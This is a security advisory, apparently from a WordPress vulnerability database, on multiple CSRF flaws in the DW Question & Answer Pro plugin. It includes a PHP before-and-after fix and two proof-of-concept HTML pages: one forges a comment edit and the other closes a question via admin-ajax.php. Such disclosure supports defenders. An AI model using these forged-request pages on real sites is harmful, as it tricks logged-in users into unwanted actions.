WordPress Plugin Vulnerabilities

DW Question & Answer Pro < 1.3.7 - Multiple CSRF

Description

The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged-in users perform unwanted actions, such as updating a comment or a question's status.

The vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue despite being notified numerous times since.
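To show what the missing check looks like on the server side, here is an added example (not the plugin's own code) of a hypothetical admin-ajax handler for the dwqa-update-question-status action used in the second PoC, first without and then with the nonce and capability checks WordPress provides; the function names and the accepted status values are assumptions.

```php
<?php
// Added example, not code from the DW Question & Answer plugin. The handler
// names and the set of allowed statuses are assumptions for illustration.

// BEFORE: no nonce and no capability check. A form on any site the victim
// visits can submit "question" and "status" with the victim's cookies, which is
// the CSRF the advisory describes.
function dwqa_example_update_status_unprotected() {
    $question_id = (int) $_POST['question'];
    $status      = sanitize_key( $_POST['status'] );
    wp_update_post( array( 'ID' => $question_id, 'post_status' => $status ) );
    wp_send_json_success();
}

// AFTER: require a per-user nonce tied to this action, then confirm the
// current user may edit this particular question before touching it.
function dwqa_example_update_status_protected() {
    // Dies with HTTP 403 unless $_POST['_ajax_nonce'] or $_POST['_wpnonce']
    // holds a valid nonce for this action; a cross-site form cannot obtain it.
    check_ajax_referer( 'dwqa-update-question-status' );

    $question_id = isset( $_POST['question'] ) ? absint( $_POST['question'] ) : 0;
    $status      = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';

    if ( ! $question_id || ! current_user_can( 'edit_post', $question_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Accept only statuses the feature actually supports (assumed list).
    if ( ! in_array( $status, array( 'open', 'closed' ), true ) ) {
        wp_send_json_error( 'bad status', 400 );
    }
    wp_update_post( array( 'ID' => $question_id, 'post_status' => $status ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_dwqa-update-question-status', 'dwqa_example_update_status_protected' );

// The legitimate form or script must now carry the nonce, for example via
//   wp_nonce_field( 'dwqa-update-question-status' );
// in a rendered form, or wp_create_nonce( 'dwqa-update-question-status' )
// handed to JavaScript through wp_localize_script().
```

The same pattern (nonce plus capability check) applies to the comment-edit handler targeted by the first PoC.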

Proof of Concept

CSRF to update_comment
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/question\/adsads-2\/?comment_edit=17", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------178253989038940920481555404700");
        xhr.withCredentials = true;
        var body = "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"comment_content\"\r\n" + 
          "\r\n" + 
          "TESTCSRF\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa_upload[]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-mention-submit-form\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-mention-submit-form-highlight\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"comment_id\"\r\n" + 
          "\r\n" + 
          "17\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-edit-comment-submit\"\r\n" + 
          "\r\n" + 
          "Save Changes\r\n" + 
          "-----------------------------178253989038940920481555404700--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

CSRF to update a question status
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="dwqa-update-question-status" />
      <input type="hidden" name="question" value="79" />
      <input type="hidden" name="status" value="closed" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Affects Plugins

References

YouTube Video

Classification

Miscellaneous

Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Verified
Yes

Timeline

Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2023-02-02 (about 1 year ago)
